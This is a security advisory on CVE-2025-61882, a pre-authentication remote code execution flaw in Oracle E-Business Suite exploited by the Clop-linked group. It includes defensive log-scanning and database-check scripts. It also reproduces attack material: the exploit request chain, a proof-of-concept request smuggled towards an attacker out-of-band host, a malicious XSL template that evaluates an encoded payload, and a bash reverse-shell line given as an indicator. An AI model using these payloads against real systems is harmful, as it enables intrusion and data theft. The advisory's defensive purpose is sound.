CVE-2025-61882
Base Score: 9.8 CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Who: GRACEFUL SPIDER, a financially motivated criminal group that is known to use the Clop ransomware
What: A remote code execution vulnerability affecting Oracle E-Business Suite (EBS) versions 12.2.3 through 12.2.14, specifically the BI Publisher Integration component of the Oracle Concurrent Processing product
When: First known exploitation occurred on August 9, 2025
Where: Public-sector networks
Why: This vulnerability is remotely exploitable without authentication and must be patched immediately
Technical Details
The authentication bypass technique involves an HTTP POST request to /OA_HTML/SyncServlet.
Next, a series of HTTP requests is issued to Oracle's XML Publisher Template Manager to obtain code execution within an XSLT template:
GET /OA_HTML/RF.jsp?function_id=XDO_TEMPLATES&security_group_id=
GET /OA_HTML/RF.jsp?function_id=XDO_DS_DEFINITIONS&security_group_id=
POST /OA_HTML/OA.jsp?page=oracle/apps/xdo/oa/template/webui/TemplatesHomePG
GET /OA_HTML/OA.jsp?page=oracle/apps/xdo/oa/template/webui/TemplateCopyPG
POST /OA_HTML/OA.jsp?page=oracle/apps/xdo/oa/template/webui/TemplateCopyPG
GET /OA_HTML/OA.jsp?page=oracle/apps/xdo/oa/template/webui/TemplateFileAddPG
POST /OA_HTML/OA.jsp?page=oracle/apps/xdo/oa/template/webui/TemplatePreviewPG
Additionally, the malicious templates in xdo_templates_vl within the Oracle EBS database are known to match URL references carrying the TemplateCode value:
/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=<TEMPLATE_NAME>
CrowdStrike researchers have noted that, “Successful template execution establishes an outbound connection from the Java web server process to attacker-controlled infrastructure over port 443.” This connection was observed in some cases to load a webshell with the goal of establishing persistence on the target device.
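As an added illustration (not part of the original advisory, nor CrowdStrike's or watchTowr's material), the following Python script scans web-server access log lines for the request sequence described above and for the two IP indicators listed under Indicators of Compromise. It groups requests by client address, records which stage of the chain each client reached (stage names are the script's own), and collects the TemplateCode values seen on TemplatePreviewPG requests so they can be compared against xdo_templates_vl. The combined log format, the client addresses and the TemplateCode value are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# The two IP indicators from this advisory (defanged on the page, plain here for matching).
IOC_IPS = {"200.107.207.26", "185.181.60.11"}

# Apache/Nginx "combined" access-log format; assumption: the EBS web tier logs in that format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def _page(query):
    """OA.jsp 'page' parameter, with or without the leading slash."""
    return query.get("page", [""])[0].lstrip("/")


# Stages of the chain described in the advisory; the stage names are ours, not Oracle's.
STAGES = {
    "auth_bypass": lambda m, p, q: m == "POST" and p == "/OA_HTML/SyncServlet",
    "template_manager": lambda m, p, q: p == "/OA_HTML/RF.jsp"
        and q.get("function_id", [""])[0] in ("XDO_TEMPLATES", "XDO_DS_DEFINITIONS"),
    "template_upload": lambda m, p, q: m == "POST" and p == "/OA_HTML/OA.jsp"
        and _page(q).endswith(("TemplatesHomePG", "TemplateCopyPG", "TemplateFileAddPG")),
    "template_preview": lambda m, p, q: p == "/OA_HTML/OA.jsp"
        and _page(q).endswith("TemplatePreviewPG"),
}


def parse_line(line):
    """Return the fields needed from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    return {"ip": m["ip"], "method": m["method"], "path": url.path,
            "query": parse_qs(url.query), "status": int(m["status"])}


def analyze(lines):
    """Group requests by client IP and report which chain stages each client reached."""
    stages_by_ip = defaultdict(set)
    template_codes = set()
    ioc_hits = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["ip"] in IOC_IPS:
            ioc_hits.add(rec["ip"])
        for name, matches in STAGES.items():
            if matches(rec["method"], rec["path"], rec["query"]):
                stages_by_ip[rec["ip"]].add(name)
        # TemplateCode values seen on preview requests feed the xdo_templates_vl check.
        if STAGES["template_preview"](rec["method"], rec["path"], rec["query"]):
            template_codes.update(rec["query"].get("TemplateCode", []))
    return {
        "stages": {ip: sorted(s) for ip, s in stages_by_ip.items()},
        "full_chain": sorted(ip for ip, s in stages_by_ip.items() if len(s) == len(STAGES)),
        "template_codes": sorted(template_codes),
        "ioc_ips": sorted(ioc_hits),
    }


# Constructed sample log: documentation-range client addresses plus one IoC address from the page.
SAMPLE_LOG = """\
203.0.113.10 - - [09/Aug/2025:10:00:01 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [09/Aug/2025:10:00:02 +0000] "GET /OA_HTML/RF.jsp?function_id=XDO_TEMPLATES&security_group_id= HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.10 - - [09/Aug/2025:10:00:03 +0000] "POST /OA_HTML/OA.jsp?page=oracle/apps/xdo/oa/template/webui/TemplateCopyPG HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.10 - - [09/Aug/2025:10:00:04 +0000] "POST /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=EXAMPLE_TMPL_A HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Aug/2025:10:05:00 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
200.107.207.26 - - [09/Aug/2025:11:00:00 +0000] "GET /OA_HTML/RF.jsp?function_id=XDO_DS_DEFINITIONS&security_group_id= HTTP/1.1" 200 1024 "-" "python-requests/2.31"
"""

if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_LOG.splitlines()), indent=2))
```

A client that reaches all four stages is reported under full_chain; a partial set of stages (for example only the Template Manager pages) is still worth review, since legitimate administrators rarely arrive there without an authenticated AppsLogin session first.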
The researchers from watchTowr Labs have also demonstrated a proof-of-concept exploit workflow for achieving the full pre-auth RCE chain:
Sending the crafted HTTP requests to the affected component
POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: not-actually-watchtowr.com-stop-emailing-us-about-iocs:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
CSRF-XHR: YES
FETCH-CSRF-TOKEN: 1
Cookie: JSESSIONID=_NG5Yg8cBERFjA5L23s9UUyzG7G8hSZpYkmc6YAEBjT71alQ2UH6!906988146; EBSDB=oSVgJCh0YacxUZCwOlLajtL2zo
Content-Length: 847
Content-Type: application/x-www-form-urlencoded
redirectFromJsp=1&getUiType=<@urlencode><?xml version="1.0" encoding="UTF-8"?>
<initialize>
    <param name="init_was_saved">test</param>
    <param name="return_url">http://apps.example.com:7201<@html_entities>/OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.2
Host: attacker-oob-server
User-Agent: anything
Connection: keep-alive
Cookie: JSESSIONID=_NG5Yg8cBERFjA5L23s9UUyzG7G8hSZpYkmc6YAEBjT71alQ2UH6!906988146; EBSDB=oSVgJCh0YacxUZCwOlLajtL2zo
 
POST /</@html_entities></param>
 
    <param name="ui_def_id">0</param>
    <param name="config_effective_usage_id">0</param>
    <param name="ui_type">Applet</param>
</initialize></@urlencode>
  
Sample Malicious XSL for Arbitrary Code Execution
<xsl:stylesheet version="1.0"
                    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                    xmlns:b64="http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder"
                    xmlns:jsm="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngineManager"
                    xmlns:eng="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngine"
                    xmlns:str="http://www.oracle.com/XSL/Transform/java/java.lang.String">
        <xsl:template match="/">
            <xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'[base64_encoded_payload]')"/>
            <xsl:variable name="js" select="str:new($bs)"/>
            <xsl:variable name="m" select="jsm:new()"/>
            <xsl:variable name="e" select="jsm:getEngineByName($m, 'js')"/>
            <xsl:variable name="code" select="eng:eval($e, $js)"/>
            <xsl:value-of select="$code"/>
        </xsl:template>
    </xsl:stylesheet>
  
Fix Actions
- Confirm the October 2023 Critical Patch Update is applied first, as it is a prerequisite for this patch
- Apply the latest patch after reviewing the patch availability information and installation instructions at https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
- Search your organization's Oracle EBS database for malicious templates in xdo_templates_vl matching URL references for the TemplateCode value
- Scrutinize UserID 0 (sysadmin) and UserID 6 (guest) sessions in icx_sessions
- Either isolate EBS instances or place a web application firewall in front of them
- Continue to monitor your network traffic and be aware of Oracle's published indicators of compromise (see below)
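As an added example for the two database checks in the list above (not part of the original advisory, and not an Oracle-supplied query), the following Python script runs the lookups against an in-memory SQLite stand-in for the EBS views. It flags xdo_templates_vl rows whose template code was seen in TemplatePreviewPG requests or that were created on or after the first known exploitation date, and lists icx_sessions rows for UserID 0 and 6. The column names, the sample rows and the template codes are assumptions constructed for the example; verify the columns against your own instance before adapting the SQL to Oracle.

```python
import sqlite3

FIRST_KNOWN_EXPLOITATION = "2025-08-09"   # first known exploitation date from the advisory
SCRUTINIZED_USER_IDS = (0, 6)             # sysadmin and guest, as named in the advisory

# Assumed columns modelled on the EBS views the advisory names; confirm them on your instance.
SCHEMA = """
CREATE TABLE xdo_templates_vl (template_code TEXT, template_name TEXT,
                               created_by INTEGER, creation_date TEXT);
CREATE TABLE icx_sessions (session_id INTEGER, user_id INTEGER,
                           creation_date TEXT, last_connect TEXT);
"""

# Constructed sample rows: one long-standing legitimate template, two created after the
# exploitation date (one of them referenced by a preview request), and a mix of sessions.
TEMPLATES = [
    ("XXCUST_INVOICE", "Customer Invoice", 1234, "2021-03-15 09:00:00"),
    ("EXAMPLE_TMPL_A", "EXAMPLE_TMPL_A", 0, "2025-08-09 03:12:00"),
    ("EXAMPLE_TMPL_B", "EXAMPLE_TMPL_B", 6, "2025-08-12 22:40:00"),
]
SESSIONS = [
    (1001, 1234, "2025-08-10 08:00:00", "2025-08-10 17:30:00"),  # ordinary named user
    (1002, 6, "2025-08-09 03:10:00", "2025-08-09 03:15:00"),     # guest, during the attack window
    (1003, 0, "2025-08-09 03:11:00", "2025-08-09 03:20:00"),     # sysadmin, during the attack window
    (1004, 0, "2025-07-01 09:00:00", "2025-07-01 12:00:00"),     # sysadmin, before the window
]

# Standard SQL so the same statements can be adapted to the Oracle EBS database.
TEMPLATE_QUERY = """
SELECT template_code, created_by, creation_date
FROM xdo_templates_vl
WHERE template_code IN ({placeholders}) OR creation_date >= ?
ORDER BY creation_date
"""
SESSION_QUERY = """
SELECT session_id, user_id, creation_date, last_connect
FROM icx_sessions
WHERE user_id IN ({placeholders}) AND creation_date >= ?
ORDER BY creation_date
"""


def load_sample_db():
    """Build the in-memory stand-in populated with the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.executemany("INSERT INTO xdo_templates_vl VALUES (?, ?, ?, ?)", TEMPLATES)
    con.executemany("INSERT INTO icx_sessions VALUES (?, ?, ?, ?)", SESSIONS)
    return con


def suspicious_templates(con, codes_seen_in_logs, since=FIRST_KNOWN_EXPLOITATION):
    """Templates referenced by preview requests, or created on/after the exploitation date."""
    codes = sorted(codes_seen_in_logs) or ["__none__"]  # keep the IN list non-empty
    sql = TEMPLATE_QUERY.format(placeholders=",".join("?" * len(codes)))
    return con.execute(sql, (*codes, since)).fetchall()


def scrutinized_sessions(con, since=FIRST_KNOWN_EXPLOITATION):
    """Sessions for the sysadmin and guest user IDs created on/after the exploitation date."""
    sql = SESSION_QUERY.format(placeholders=",".join("?" * len(SCRUTINIZED_USER_IDS)))
    return con.execute(sql, (*SCRUTINIZED_USER_IDS, since)).fetchall()


if __name__ == "__main__":
    db = load_sample_db()
    for row in suspicious_templates(db, {"EXAMPLE_TMPL_A"}):
        print("template:", row)
    for row in scrutinized_sessions(db):
        print("session:", row)
```

The date filter is the script's own narrowing; a full review should still look at every template created by an unexpected user, since a template planted before the first publicly known exploitation date would fall outside the window.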
Indicators of Compromise
200[.]107[.]207[.]26   (IP, potential GET and POST activity)
185[.]181[.]60[.]11    (IP, potential GET and POST activity)
sh -c /bin/bash -i >& /dev/tcp// 0>&1   (Command, establishes an outbound TCP connection over a specific port)
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d   (SHA-256, oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip)
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121   (SHA-256, oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py)
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b   (SHA-256, oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py)
Summary
According to the 2025 Ponemon Healthcare Cybersecurity Report, nearly 3 in 4 US healthcare organizations report patient care disruption due to cyberattacks. Additionally, over the last two years 96% of organizations experienced at least two data loss or exfiltration incidents involving sensitive healthcare data.
Given that the critical N-day vulnerability in Oracle’s E-Business Suite (EBS) is already being actively exploited by threat actors, it is strongly recommended to take immediate action if your healthcare organization has Oracle E-Business Suite (EBS) versions 12.2.3 through 12.2.14.
References
https://nvd.nist.gov/vuln/detail/CVE-2025-61882
https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/
https://www.bleepingcomputer.com/news/security/oracle-patches-ebs-zero-day-exploited-in-clop-data-theft-attacks/
https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/
https://www.proofpoint.com/us/resources/threat-reports/ponemon-healthcare-cybersecurity-report